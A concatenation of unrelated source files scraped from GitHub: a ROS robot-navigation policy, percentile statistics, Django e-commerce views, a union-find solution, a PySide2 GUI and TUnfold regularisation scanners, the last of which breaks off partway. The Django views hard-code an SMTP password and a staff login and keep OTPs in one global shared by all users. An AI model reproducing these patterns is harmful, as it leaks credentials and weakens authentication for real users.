# ============================== Pretrained Model ==========================
# Path to the exported TF meta-graph and its checkpoint directory.
meta_path = './Unitedmap_0906_reload-0/RobotBrain/model-12063494.cptk.meta'
ckpt_path = './Unitedmap_0906_reload-0/RobotBrain/'
# ==========================================================================
# TF session config: let ops fall back to CPU and grow GPU memory on demand.
config = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)
config.gpu_options.allow_growth = True
# RL model class
class RL_Model:
    """Loads a pretrained TensorFlow policy graph and publishes Twist commands.

    for testing, linear speed would be set to 0.2, while angular speed set to
    0.3 or 0.4186
    """
    def __init__(self, dir, linear_speed=0.2, angular_speed=0.3):
        # ------------------------------------------------
        # dir: path to the RL model's meta-graph file (*.meta)
        # linear_speed: linear speed (x-axis) for AGV, default is 0.2
        # angular_speed: angular speed magnitude kept on the instance
        # NOTE: `dir` shadows the builtin; name kept for caller compatibility.
        # ------------------------------------------------
        tf.reset_default_graph()
        self.sess = tf.Session()
        # BUG FIX: the original referenced an undefined name `path`; the
        # meta-graph to import is the `dir` argument (callers pass meta_path).
        self.saver = tf.train.import_meta_graph(dir)
        graph = tf.get_default_graph()
        # get variable by name from tensorflow graph
        self.visual_in = graph.get_tensor_by_name('visual_observation_0:0')
        self.action = graph.get_tensor_by_name('action:0')
        self.action_mask = graph.get_tensor_by_name('action_masks:0')
        self.action_pub = rospy.Publisher('twitch', Twist, queue_size=1)
        self.linear_speed = linear_speed
        # BUG FIX: `angular_speed` was read but never defined (NameError at
        # construction); it is now a parameter with default 0.3.
        self.angular_speed = angular_speed
        self.move_command = Twist()
        # create mask to enable three actions
        self.mask = np.array([[1, 1, 1]])
        self.saver.restore(self.sess, tf.train.latest_checkpoint(ckpt_path))
    def restore_and_run(self, img):
        # ----------------------------------------------------
        # img: batched input image from the segmentation module —
        #      presumably shaped (1, H, W, C); confirm against the graph.
        # Runs the policy, picks the argmax action and publishes a Twist.
        # ----------------------------------------------------
        # initialize parameters
        self.move_command.angular.z = 0
        self.move_command.linear.x = self.linear_speed
        # for multinomial sampling, using " act = tf.multinomial(self.action, 1) " and revise session in next row
        prob = self.sess.run([self.action], feed_dict = {self.visual_in:img, self.action_mask:self.mask})
        direction = np.argmax(prob)
        # 3-Action: 0 = keep moving forward, 1 = turn left, 2 = turn right
        if direction == 0 :
            self.move_command.angular.z = 0
        elif direction == 1:
            self.move_command.angular.z = 1
        elif direction == 2:
            self.move_command.angular.z = -1
        # publish Twist
        self.action_pub.publish(self.move_command)
# External class for RL model
class PolicyModel:
    """Thin wrapper that owns an RL_Model and forwards incoming images to it."""
    def __init__(self):
        # Build the policy from the module-level meta_path.
        self.RLmodel = RL_Model(meta_path)
        self.last_time = time.time()
    def callback(self,resize_image):
        # --------------------------------------------------
        # resize_image: image received from segmentation module
        # --------------------------------------------------
        self.RLmodel.restore_and_run(resize_image)
        # Record when the last frame was processed.
        self.last_time = time.time()
    # RL model's test function: feed 100 all-zero frames through the policy.
    def test(self):
        for i in range(100):
            fake_image = np.zeros((1, 80, 120, 3))
            self.RLmodel.restore_and_run(fake_image)
if __name__ == '__main__':
    # Receive frames over ZMQ, run the policy on each, and ack the sender.
    parser = argparse.ArgumentParser()
    parser.add_argument('--port', type=str, help='connected port', dest='port', default='5555')
    args = parser.parse_args()
    rospy.init_node('control_model', anonymous=True)
    hub = imagezmq.ImageHub(open_port='tcp://*:%s' %(args.port))
    cm = PolicyModel()
    while True:
        name, image = hub.recv_image() # receive image
        start = time.time()
        cv2.imshow("Image", image)
        image = [image]  # wrap into a batch of one for the policy
        cm.callback(image) # process the image
        print(time.time()-start)
        hub.send_reply() # get ready for next image
        cv2.waitKey(1)
|
KaiChen1008/Sim-to-Real-Virtual-Guidance-for-Robot-Navigation
|
control_policy_module/control_policy.py
|
control_policy.py
|
py
| 3,752 |
python
|
en
|
code
| 72 |
github-code
|
6
|
43356641346
|
#!/usr/bin/python3
from scipy import stats
import numpy as np
import matplotlib.pyplot as plt
import sys
NUM_TRIAL = 2000  # repeated samplings per (sample-size, percentile) pair


def calcPlotData(numSamplings, percentiles, dist):
    """Estimate, for each percentile, the standard deviation of the empirical
    percentile score as a function of sample size.

    Returns (x, y) float arrays shaped (len(percentiles), len(numSamplings)).
    """
    x_rows = []
    y_rows = []
    for percentile in percentiles:
        x_row = []
        y_row = []
        for numSampling in numSamplings:
            scores = calcScoresAtPercentile(numSampling, percentile, dist)
            x_row.append(numSampling)
            # Sample standard deviation (ddof=1) across the NUM_TRIAL repeats.
            y_row.append(np.std(scores, ddof=1))
        x_rows.append(x_row)
        y_rows.append(y_row)
    return np.array(x_rows, dtype=float), np.array(y_rows, dtype=float)


def calcScoresAtPercentile(numSampling, percentile, dist):
    """Draw NUM_TRIAL samples of size `numSampling` from `dist` and return the
    empirical `percentile` score of each draw as a 1-D array."""
    return np.array([stats.scoreatpercentile(dist.rvs(size=numSampling), percentile)
                     for _ in range(NUM_TRIAL)])
def plot(title, plotXData, plotYData, percentiles):
    """Plot std-dev vs sample size, one line per percentile, and save it to
    '<title>.png' (spaces replaced by underscores, lower-cased)."""
    plt.clf()
    plt.figure(figsize=(15, 9))
    plt.rcParams["font.size"] = 24
    # X ticks every 10 samples up to the largest sample size.
    plt.xticks(np.arange(0, np.max(plotXData)+10, 10))
    plt.grid()
    for i, x in enumerate(plotXData):
        plt.plot(x, plotYData[i], marker='o', label='percentile='+str(percentiles[i]))
    plt.title(title)
    plt.xlabel("The number of samples")
    plt.ylabel("Standard deviation")
    plt.legend()
    plt.savefig(title.replace(" ", "_").lower() + ".png", dpi=200)
def main():
    """Run the percentile-stability study for three distributions and write
    one plot per distribution."""
    numSamplings = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]
    percentiles = [1, 10, 50, 90, 99]
    dists = {
        "Uniform distribution": stats.uniform(),
        "Normal distribution": stats.norm(),
        "Exponential distribution": stats.expon()
    }
    for distName, dist in dists.items():
        print("dist: {}".format(distName))
        plotXData, plotYData = calcPlotData(numSamplings, percentiles, dist)
        print(plotYData)
        plot(distName, plotXData, plotYData, percentiles)
if __name__ == "__main__":
    main()
|
peng225/blog
|
230114/percentile.py
|
percentile.py
|
py
| 2,211 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30789833021
|
from django.contrib import messages
from django.shortcuts import render
import random
import smtplib
from.models import Onlinepayment,Offlinepayment,Onlineapproval,Offlineapproval,Send
# Template-only product pages: each view just renders its template.
def home(request):
    return render(request,'f1.html')
def tv(request):
    return render(request,'tv.html')
def mobile(request):
    return render(request,'mobile.html')
def theatre(request):
    return render(request,'hometheatre.html')
def air(request):
    return render(request,'airconditioner.html')
def buy(request):
    """Render the OTP-verification page.

    Both the POST and non-POST branches rendered the same template, so no
    method check is needed.
    """
    return render(request, 'otpver.html')
def offpay(request):
    """Render the offline-payment page (same template for every method)."""
    return render(request, 'offlinepayment.html')
def onpay(request):
    """Render the online-payment page.

    BUG FIX: the non-POST branch rendered 'onlinepyment.html' (typo) while the
    POST branch rendered 'onlinepayment.html'; both now use the latter.
    """
    return render(request, 'onlinepayment.html')
def onlineok(request):
    """Record an online order, e-mail a confirmation, and re-render the page.

    SECURITY: SMTP credentials are hard-coded in source — move them to
    settings/environment. NOTE(review): the else branch fires for any
    non-POST request, not only failed registrations — confirm intent.
    """
    if request.method == 'POST':
        # Raises KeyError if any expected form field is missing.
        name = request.POST['name']
        address = request.POST['address']
        city = request.POST['city']
        ph = request.POST['ph']
        mail = request.POST['mail']
        item = request.POST['item']
        imo = request.POST['imo']
        credit = request.POST['credit']
        Onlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item,
                       imo=imo, credit=credit).save()
        msg = name + ", your order has been registered you will get your product within " \
                     "one week. Your payment has been received. for any quiries contact-xxxx "
        # Send the confirmation mail over STARTTLS.
        s = smtplib.SMTP('smtp.gmail.com', 587)
        s.starttls()
        s.login("[email protected]", "Nimishakc@98")
        s.sendmail("[email protected]",mail, msg)
        s.quit()
        messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY')
        return render(request,'onlinepayment.html')
    else:
        messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER')
        return render(request,'onlinepayment.html')
def offlineok(request):
    """Record an offline (pay-on-delivery) order and e-mail a confirmation.

    SECURITY: SMTP credentials are hard-coded in source — move them to
    settings/environment. NOTE(review): the else branch fires for any
    non-POST request, not only failed registrations — confirm intent.
    """
    if request.method == 'POST':
        # Raises KeyError if any expected form field is missing.
        name = request.POST['name']
        address = request.POST['address']
        city = request.POST['city']
        ph = request.POST['ph']
        mail = request.POST['mail']
        item = request.POST['item']
        imo = request.POST['imo']
        Offlineapproval(name=name, address=address, city=city, ph=ph, mail=mail, item=item,
                        imo=imo).save()
        msg = name + ", your order has been registered you will get your product within " \
                     "one week. Your have opted offline payment system. for any quiries contact-xxxx "
        # Send the confirmation mail over STARTTLS.
        s = smtplib.SMTP('smtp.gmail.com', 587)
        s.starttls()
        s.login("[email protected]", "Nimishakc@98")
        s.sendmail("[email protected]", mail, msg)
        s.quit()
        messages.success(request, 'SUCCESSFULLY ORDERED YOU WILL RECIEVE AN EMAIL SHORTLY')
        return render(request,'offlinepayment.html')
    else:
        messages.success(request, 'REGISTRATION FAILED TRY AGAIN LATER')
        return render(request,'offlinepayment.html')
def staff(request):
    """Render the staff login page."""
    return render(request,'staff.html')
def app(request):
    """Authenticate a staff member and show the dashboard on success.

    SECURITY: credentials are hard-coded in source; replace with a proper
    auth backend or settings-provided secrets.
    """
    if request.method == 'POST':
        username = request.POST['username']
        password = request.POST['password']
        if username == 'app' and password == 'app':
            return render(request, 'dashboard.html')
        else:
            return render(request, 'staff.html')
    # BUG FIX: non-POST requests previously fell through and returned None,
    # which makes Django raise; show the login form instead.
    return render(request, 'staff.html')
def onappro(request):
    # List every online order awaiting approval.
    x = Onlineapproval.objects.all()
    return render(request, 'onlineapproval.html', {'all': x})
def offapro(request):
    # List every offline order awaiting approval.
    x = Offlineapproval.objects.all()
    return render(request, 'offlineapproval.html', {'all': x})
# Payment-status pages: same template regardless of request method.
def onpays(request):
    if request.method == 'POST':
        return render(request,'onlinestatus.html')
    else:
        return render(request, 'onlinestatus.html')
def offpays(request):
    if request.method == 'POST':
        return render(request,'offlinestatus.html')
    else:
        return render(request, 'offlinestatus.html')
# Holds the most recent OTP accessor; rebound to a closure by send().
# NOTE(review): a single module-global slot is shared by ALL users/requests
# (race condition) and is lost on process restart — use the session instead.
val=None
def send(request):
    """Generate a 4-digit OTP, e-mail it, and stash it for verify().

    SECURITY: SMTP credentials are hard-coded in source — move them to
    settings/environment.
    """
    if request.method == 'POST':
        email = request.POST['email']
        x = str(random.randint(1000,9999))
        c=x
        global val
        # Rebind the global to a closure returning this request's OTP.
        def val():
            return c
        s = smtplib.SMTP('smtp.gmail.com', 587)
        s.starttls()
        s.login("[email protected]", "Nimishakc@98")
        s.sendmail("[email protected]",email, x)
        s.quit()
        messages.success(request, 'OTP SENT CHECK YOUR MAIL')
        return render(request,'otpver.html')
    else:
        return render(request,'otpver.html')
def verify(request):
    """Compare the submitted OTP with the one stashed by send().

    NOTE(review): raises TypeError if send() has not run yet (val is still
    None), and returns None (a Django error) for non-POST requests — confirm
    whether both paths should render the OTP page instead.
    """
    if request.method == 'POST':
        otpcheck = request.POST['otpcheck']
        ok=val()
        # Both sides are strings, so equality comparison is correct here.
        if otpcheck == ok:
            messages.success(request, 'LOGGED IN')
            return render(request,'registration.html')
        else:
            messages.success(request, 'FAILED TO VERIFY OTP')
            return render(request,'otpver.html')
# Staff dashboard home and logout: template-only views.
def homea(request):
    return render(request,'dashboard.html')
def logout(request):
    return render(request,'staff.html')
|
Nimishakc/NimishaFinal
|
eapp/views.py
|
views.py
|
py
| 5,321 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28968326311
|
# Catalogue: name -> [description, price label, price per 100 g, currency,
#                     weight label, stock in grams, unit]
confectionery_dict = {"торт": ["состав - мука, сахар, дрожжи, арахис, шоколад, заварной крем",
                               "цена за 100 гр - ", 1.95, "руб", "вес - ", 3900, "гр"],
                      "пироженое": ["состав - мука, сахар, грецкий орех, разрыхлитель",
                                    "цена за 100 гр - ", 2.05, "руб", "вес - ", 4120, "гр"],
                      "маффин": ["состав - мука, дрожжи, сахар, фруктовый джем",
                                 "цена за 100 гр -", 1.80, "руб", "вес - ", 6100, "гр"],
                      "желе": ["состав - желатин, фруктовый сироп",
                               "цена за 100 гр -", 1.10, "руб", "вес - ", 1290, "гр"],
                      "пастила": ["состав - яичный белок, сахар, загуститель",
                                  "цена за 100 гр -", 1.20, "руб", "вес -", 2120, "гр"],
                      "пахлава": ["состав - мука, грецкий орех, арахис, мёд",
                                  "цена за 100 гр -", 1.50, "руб", " вес -", 2140, "гр"]}
# Menu: 1-4 show catalogue slices, 5 enters purchase mode.
customer = int(input("""Наберите 1, 2, 3 или 4, если Вы хотите посмотреть описание, цену,
                     количество или всю информацию о продукции.
                     Наберите 5, если Вы хотите что-то приобрести :"""))
try:
    if customer == 1:
        # Descriptions only.
        for key, value in confectionery_dict.items():
            print(key, ":", value[0])
    elif customer == 2:
        # Price information.
        for key, value in confectionery_dict.items():
            print(key, ":", value[1:4])
    elif customer == 3:
        # Stock information.
        for key, value in confectionery_dict.items():
            print(key, ":", value[4:])
    elif customer == 4:
        # Full records.
        for key, value in confectionery_dict.items():
            print(key, ":", value)
    elif customer == 5:
        cost_of_production = 0
        # BUG FIX: the purchase loop was wrapped in a pointless
        # `for key, value in confectionery_dict.items()` whose variables were
        # never used; after the user finished (i == 0) it just spun through
        # dead iterations. The while-loop alone is sufficient.
        i = 1
        while i != 0:
            purchase = input("Введите название продукции :").lower()
            number_of_products = int(input("Введите количество продукции в граммах или 0 для завершения :"))
            cost_of_production += float(confectionery_dict[purchase][2]) * (number_of_products / 100)
            remainder_of_production = int(confectionery_dict[purchase][5]) - number_of_products
            print(f"{purchase}: Oсталось продукции в продаже : {remainder_of_production} грамм")
            i = int(input("Enter 1 to continue, or 0 to complete :"))
            if i == 0:
                print(f"Стоимость приобретенной продукции равна: {cost_of_production} руб")
                break
except KeyError:
    # Unknown product name entered at the purchase prompt.
    print("Нет такой продукции")
finally:
    print("До свидания!")
|
vladalh/Overone-Python
|
exam2_5.py
|
exam2_5.py
|
py
| 3,354 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
34332202564
|
import csv
import os
# Locations of the raw keystroke dump and the CSV output.
save_path = r"/home/riddhi/keystroke/output_numpy/dataset/"
csv_file = save_path + r"genuine_user.csv"
inputfileloc = save_path + r"genuine.txt"
# Convert the whitespace-separated dump into a CSV with a header row.
# BUG FIX / cleanup: both files are now closed via `with` even on error (the
# input file previously leaked on exceptions), the input is streamed instead
# of being materialised into a list, and the debug prints are gone.
with open(inputfileloc, 'r') as inputfile, open(csv_file, 'w') as csvfile:
    fieldnames = ['user', 'pr', 'pp', 'rp', 'rr', 'total', 'output']
    csvwriter = csv.DictWriter(csvfile, fieldnames=fieldnames)
    csvwriter.writeheader()
    for raw in inputfile:
        parts = raw[:-1].split()
        # NOTE(review): the header orders pr before pp, but pp is taken from
        # column 1 and pr from column 2 — confirm against the dump's layout.
        csvwriter.writerow({'user': parts[0], 'pp': parts[1], 'pr': parts[2],
                            'rp': parts[3], 'rr': parts[4], 'total': parts[5],
                            'output': parts[6]})
|
vishaltak/keystroke
|
txt2csv.py
|
txt2csv.py
|
py
| 859 |
python
|
en
|
code
| 1 |
github-code
|
6
|
32586118182
|
class UnionFind:
    """Disjoint-set forest with full path compression and union by size."""
    def __init__(self, n):
        # par[x] == -1 marks a root; otherwise par[x] is x's parent.
        self.par = [-1]*n
        # siz[x] is the component size; meaningful only while x is a root.
        self.siz = [1]*n
    def root(self, x):
        """Return x's representative, re-parenting the whole path to it."""
        trail = []
        while self.par[x] != -1:
            trail.append(x)
            x = self.par[x]
        for node in trail:
            self.par[node] = x
        return x
    def unite(self, x, y):
        """Merge the components of x and y; True if they were separate."""
        rx, ry = self.root(x), self.root(y)
        if rx == ry:
            return False
        # Attach the smaller tree beneath the larger one.
        if self.siz[rx] < self.siz[ry]:
            rx, ry = ry, rx
        self.par[ry] = rx
        self.siz[rx] += self.siz[ry]
        return True
    def same(self, x, y):
        """True when x and y share a component."""
        return self.root(x) == self.root(y)
    def size(self, x):
        """Size of the component containing x."""
        return self.siz[self.root(x)]
# Approach: unite every given edge, then the answer is
# (number of distinct tree roots - 1) — the extra edges needed to make the
# whole graph connected. A set makes collecting the roots easy.
n, m = map(int, input().split())
uf = UnionFind(n)
for i in range(m):
    a, b = map(int, input().split())
    # Convert 1-based input vertices to 0-based indices.
    a -= 1
    b -= 1
    uf.unite(a, b)
se = set()
for i in range(n):
    se.add(uf.root(i))
print(len(se) - 1)
|
yuyu5510/Union-Find
|
code/Python/ARC032B.py
|
ARC032B.py
|
py
| 1,216 |
python
|
ja
|
code
| 1 |
github-code
|
6
|
11691605009
|
import imp
import re
from PySide2.QtWidgets import QMainWindow
from PySide2.QtCore import Slot
from ui_mainwindow import Ui_MainWindow
from particulasact.particula import Particula
from particulasact.index import Nodo, Lista_ligada
class MainWindow(QMainWindow):
    """Main window: builds Particula objects from the form's spin boxes and
    stores them in a linked list, inserting at either end."""
    def __init__(self):
        super(MainWindow, self).__init__()
        self.lista_ligada = Lista_ligada()
        self.ui = Ui_MainWindow()
        self.ui.setupUi(self)
        # Wire the three buttons to their slots.
        self.ui.agregarFinal_pushButton.clicked.connect(
            self.click_agregarFinal)
        self.ui.agregarInicio_pushButton.clicked.connect(
            self.click_agregarInicio)
        self.ui.mostrar_pushButton.clicked.connect(self.click_mostrar)
    def creadorDeParticulas(self):
        """Build a Particula from the current form values; its id is the next
        list position (current element count + 1)."""
        destinoX = self.ui.destinoX_spinBox.value()
        origenX = self.ui.origenX_spinBox.value()
        destinoY = self.ui.destinoY_spinBox.value()
        origenY = self.ui.origenY_spinBox.value()
        velocidad = self.ui.velocidad_spinBox.value()
        red = self.ui.red_spinBox.value()
        green = self.ui.green_spinBox.value()
        blue = self.ui.blue_spinBox.value()
        return Particula(self.lista_ligada.no_elements+1, origenX, origenY,
                         destinoX, destinoY, velocidad, red, green, blue)
    @Slot()
    def click_mostrar(self):
        """Show the whole linked list in the output pane."""
        self.ui.salida.clear()
        self.ui.salida.insertPlainText(str(self.lista_ligada))
    @Slot()
    def click_agregarFinal(self):
        """Append a new particle node at the tail of the list."""
        particula = self.creadorDeParticulas()
        nodo = Nodo(particula)
        self.lista_ligada.agregar_final(nodo)
        self.ui.salida.clear()
        self.ui.salida.insertPlainText("Agregado al Final")
        """ self.ui.salida.insertPlainText(
            f"ID:{particula.id}\nOrigen X:{particula.origen_x}\nDestino X: {particula.destino_x}\nOrigen Y:{particula.origen_y}\nDestino Y: {particula.destino_y}\nVelocidad: {particula.velocidad}\nDistancia:{particula.distancia}\nRed: {particula.red}\nGreen: {particula.green}\nBlue: {particula.blue}")
        """
    @Slot()
    def click_agregarInicio(self):
        """Insert a new particle node at the head of the list."""
        particula = self.creadorDeParticulas()
        nodo = Nodo(particula)
        self.lista_ligada.agregar_inicio(nodo)
        self.ui.salida.clear()
        self.ui.salida.insertPlainText("Agregado al Inicio")
|
arturos8617/actividad06
|
mainwindow.py
|
mainwindow.py
|
py
| 2,290 |
python
|
es
|
code
| 0 |
github-code
|
6
|
41746506951
|
# -*- coding:utf-8 -*-
import os
os.environ["CHAINER_TYPE_CHECK"] = "0"
import numpy as np
import chainer
import chainer.functions as F
import chainer.links as L
from chainer import cuda, Variable
from chainer.initializers import GlorotNormal
class SelectiveGate(chainer.Chain):
    """Selective gate: sigmoid-gates each timestep of a sequence of hidden
    states using a per-batch summary vector, zeroing masked-out timesteps."""
    def __init__(self, hidden_size):
        super(SelectiveGate, self).__init__(
            xh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True),
            hh=L.Linear(in_size=None,out_size=hidden_size,initialW=GlorotNormal(),nobias=True),
        )
        self.hidden_size = hidden_size
    def __call__(self,batch_seq_h, batch_h,enable):
        # batch_seq_h: per-timestep hidden states, shape (batch, seq, feat)
        # batch_h: one summary vector per batch element
        # enable: (batch, seq) mask — presumably bool, True for valid steps;
        #         confirm against the caller.
        batch_size = batch_seq_h.shape[0]
        seq_size = batch_seq_h.shape[1]
        # Project the summary vector and broadcast it across the seq axis.
        matp = F.expand_dims(self.xh(batch_h), axis=1)
        matp = F.broadcast_to(matp, (batch_size, seq_size, self.hidden_size))
        # Project every timestep (flattened to 2-D for the Linear layer).
        ab = F.reshape(batch_seq_h,(batch_size * seq_size, -1))
        wab = self.hh(ab)
        wab = F.reshape(wab, (batch_size, seq_size, -1))
        # Per-element gate in [0, 1]; masked timesteps get a zero gate.
        sGate=F.sigmoid(wab + matp)
        enable = F.expand_dims(enable, axis=2)
        enable = F.broadcast_to(enable, sGate.shape)
        sGate = F.where(enable, sGate, self.xp.zeros(sGate.shape, dtype=self.xp.float32))
        return batch_seq_h*sGate
|
rn5l/session-rec
|
algorithms/RepeatNet/base/selective_gate.py
|
selective_gate.py
|
py
| 1,280 |
python
|
en
|
code
| 362 |
github-code
|
6
|
5679963414
|
"""
Classes to be used when determining regularisation in unfolding
"""
from __future__ import print_function, division
from array import array
import numpy as np
import math
import os
from itertools import chain
import ROOT
from MyStyle import My_Style
from comparator import Contribution, Plot
My_Style.cd()
import common_utils as cu
import qg_common as qgc
import qg_general_plots as qgp
# This doesn't seem to work...sigh
np.set_printoptions(edgeitems=3,infstr='Infinity',
                    linewidth=75, nanstr='nan', precision=8,
                    suppress=False, threshold=1000, formatter=None)
# Keep ROOT from eating argv, run without GUI windows, and track sum-of-
# weights (errors) on all histograms by default.
ROOT.PyConfig.IgnoreCommandLineOptions = True
ROOT.gROOT.SetBatch(1)
ROOT.TH1.SetDefaultSumw2()
class TauScanner(object):
    """Class to handle doing ScanTau on a TUnfoldBinning object,
    since it produces many associated objects & values.
    Can also plot results from scanning.
    """
    def __init__(self):
        # Null pointers are filled by TUnfoldDensity.ScanTau() in scan_tau().
        self.scan_results = ROOT.MakeNullPointer(ROOT.TSpline)
        self.l_curve = ROOT.MakeNullPointer(ROOT.TGraph)
        self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline)
        self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline)
        # Chosen regularisation strength after scan_tau().
        self.tau = 0
        self.scan_mode = ""
        self.graph_all_scan_points = None
        self.graph_best_scan_point = None
    def scan_tau(self, tunfolder, n_scan, tau_min, tau_max, scan_mode, distribution, axis_steering):
        """Run tunfolder.ScanTau, cache & return the optimal tau."""
        ind_best_point = tunfolder.ScanTau(n_scan,
                                           tau_min,
                                           tau_max,
                                           self.scan_results,
                                           scan_mode,
                                           distribution,
                                           axis_steering,
                                           self.l_curve,
                                           self.log_tau_x,
                                           self.log_tau_y)
        self.tau = tunfolder.GetTau()
        self._process_results(scan_mode, ind_best_point)
        print("scan_tau value is {}".format(self.tau))
        print("chi**2 A {:3.1f} + chi**2 L {:3.1f} / NDOF {:3.1f} ".format(tunfolder.GetChi2A(),
                                                                           tunfolder.GetChi2L(),
                                                                           tunfolder.GetNdf()))
        return self.tau
    def _process_results(self, scan_mode, ind_best_point):
        """Create graphs etc from ScanTau output
        User shouldn't call this, only internal
        """
        # Get best scan point & make graph of it
        # t here is log_10(tau)
        t, rho = array('d'), array('d') # array obj needed to make TGraph
        t0 = ROOT.Double(0.0)
        rho0 = ROOT.Double(0.0)
        self.scan_results.GetKnot(ind_best_point, t0, rho0)
        t.append(t0)
        rho.append(rho0)
        self.graph_best_scan_point = ROOT.TGraph(1, t, rho)
        print("t[0] =", t[0])
        print("rho[0] =", rho[0])
        print("10^log_10(tau) = tau =", math.pow(10., float(t0)))
        # Make graph of all the points scanned
        t_all, rho_all = array('d'), array('d')
        n_scan = self.scan_results.GetNp()
        for i in range(n_scan):
            tt = ROOT.Double(0.0)
            rr = ROOT.Double(0.0)
            self.scan_results.GetKnot(i, tt, rr)
            t_all.append(tt)
            rho_all.append(rr)
        self.graph_all_scan_points = ROOT.TGraph(int(n_scan), t_all, rho_all)
        # Human-readable description of the quantity minimised by each mode.
        tau_mode_dict = {
            ROOT.TUnfoldDensity.kEScanTauRhoAvg: "average (stat+bgr) global correlation (#rho)",
            ROOT.TUnfoldDensity.kEScanTauRhoAvgSys: "average (stat+bgr+sys) global correlation (#rho)",
            ROOT.TUnfoldDensity.kEScanTauRhoMax: "maximum (stat+bgr) global correlation (#rho)",
            ROOT.TUnfoldDensity.kEScanTauRhoMaxSys: "maximum (stat+bgr+sys) global correlation (#rho)",
            ROOT.TUnfoldDensity.kEScanTauRhoSquareAvg: "average (stat+bgr) global correlation (#rho) squared",
            ROOT.TUnfoldDensity.kEScanTauRhoSquareAvgSys: "average (stat+bgr+sys) global correlation (#rho) squared",
        }
        self.graph_all_scan_points.SetTitle("Optimization of Regularization Parameter, #tau : Scan of {}".format(tau_mode_dict[scan_mode]))
    def plot_scan_tau(self, output_filename):
        """Plot graph of scan results, and optimum tau"""
        canv_tau_scan = ROOT.TCanvas("canv_tau_scan_"+str(self.tau), "canv_tau_scan_"+str(self.tau))
        self.graph_all_scan_points.SetLineColor(ROOT.kBlue+3)
        self.graph_all_scan_points.Draw()
        self.graph_best_scan_point.SetMarkerColor(ROOT.kRed)
        self.graph_best_scan_point.Draw("* same")
        self.graph_all_scan_points.GetXaxis().SetTitle("log_{10}(#tau)")
        self.graph_all_scan_points.GetYaxis().SetTitle(" #rho")
        leg = ROOT.TLegend(0.2, 0.6, 0.35, 0.89)
        leg.SetFillColor(0)
        leg.SetFillStyle(0)
        leg.SetBorderSize(0)
        leg.SetTextSize(0.026)
        leg.AddEntry(self.graph_all_scan_points, 'Scan over #tau', 'l')
        leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P')
        leg.Draw()
        # Create the output directory if it is missing, then save the canvas.
        cu.check_dir_exists_create(os.path.dirname(os.path.abspath(output_filename)))
        canv_tau_scan.Print(output_filename)
    def save_to_tfile(self, tfile):
        """Persist both scan graphs into an open TFile."""
        tfile.WriteTObject(self.graph_all_scan_points, "regularize_all_scan_points")
        tfile.WriteTObject(self.graph_best_scan_point, "regularize_best_scan_point")
class LCurveScanner(object):
    """Class to handle doing ScanLcurve on a TUnfoldBinning object,
    since it produces many associated objects & values.
    Can also plot results from scanning.
    """
    def __init__(self):
        # Null pointers are filled by TUnfoldDensity.ScanLcurve() in scan_L().
        self.scanned_l_curve = ROOT.MakeNullPointer(ROOT.TGraph)
        self.log_tau_x = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve x-coord as a func of log_10(tau)
        self.log_tau_y = ROOT.MakeNullPointer(ROOT.TSpline3) # spline of L-curve y-coord as a func of log_10(tau)
        self.log_tau_curvature = ROOT.MakeNullPointer(ROOT.TSpline3)
        self.graph_log_tau_curvature = None # to hold graph of log_tau_curvature
        self.graph_log_tau_curvature_best = None
        # Chosen regularisation strength after scan_L().
        self.tau = 0
        self.graph_best_scan_point = None # in terms of LcurveY vs LcurveX
    def scan_L(self, tunfolder, n_scan, tau_min, tau_max):
        """Run tunfolder.ScanLcurve, cache & return the optimal tau."""
        ind_best_point = tunfolder.ScanLcurve(n_scan,
                                              tau_min,
                                              tau_max,
                                              self.scanned_l_curve,
                                              self.log_tau_x,
                                              self.log_tau_y,
                                              self.log_tau_curvature)
        self.tau = tunfolder.GetTau()
        self._process_results(ind_best_point)
        return self.tau
    def _process_results(self, ind_best_point):
        """Create graphs etc from ScanLcurve output
        User shouldn't call this, only internal
        """
        # Get best scan point & make graph of it
        t_0 = ROOT.Double(0.0) # is log_10(tau)
        x_0 = ROOT.Double(0.0)
        y_0 = ROOT.Double(0.0)
        self.log_tau_x.GetKnot(ind_best_point, t_0, x_0)
        self.log_tau_y.GetKnot(ind_best_point, t_0, y_0)
        self.graph_best_scan_point = ROOT.TGraph(1, array('d', [x_0]), array('d', [y_0]))
        # Create graph of curvature
        t_all, c_all = array('d'), array('d')
        n_scan = self.log_tau_curvature.GetNp()
        for i in range(n_scan):
            t = ROOT.Double(0.0) # is log_10(tau)
            c = ROOT.Double(0.0)
            self.log_tau_curvature.GetKnot(i, t, c)
            t_all.append(t)
            c_all.append(c)
        self.graph_log_tau_curvature = ROOT.TGraph(n_scan, t_all, c_all)
        # Get best scan point in terms of curvature vs log(tau)
        # you cannot use the index, it doesn't correspond to this graph
        c_0 = self.log_tau_curvature.Eval(t_0)
        self.graph_log_tau_curvature_best = ROOT.TGraph(1, array('d', [t_0]), array('d', [c_0]))
    def plot_scan_L_curve(self, output_filename):
        """Plot graph of scan results, and optimum tau"""
        canv_L_scan = ROOT.TCanvas("canv_L_scan_"+str(self.tau), "canv_L_scan_"+str(self.tau))
        self.scanned_l_curve.SetTitle("Optimization of Regularization Parameter, #tau : Scan of L curve")
        self.scanned_l_curve.SetLineColor(ROOT.kBlue+3)
        self.scanned_l_curve.Draw()
        self.graph_best_scan_point.SetMarkerColor(ROOT.kRed)
        self.graph_best_scan_point.Draw("* same")
        self.scanned_l_curve.GetXaxis().SetTitle("log_{10}(L_{1})")
        self.scanned_l_curve.GetYaxis().SetTitle("log_{10}(#frac{L_{2}}{#tau^{2}})")
        leg = ROOT.TLegend(0.5, 0.6, 0.85, 0.89)
        leg.SetFillColor(0)
        leg.SetFillStyle(0)
        leg.SetBorderSize(0)
        leg.SetTextSize(0.026)
        leg.AddEntry(self.scanned_l_curve, 'Scan over #tau', 'l')
        leg.AddEntry(self.graph_best_scan_point, 'Chosen point: #tau = {}'.format(self.tau), 'P')
        leg.Draw()
        # Create the output directory if it is missing, then save the canvas.
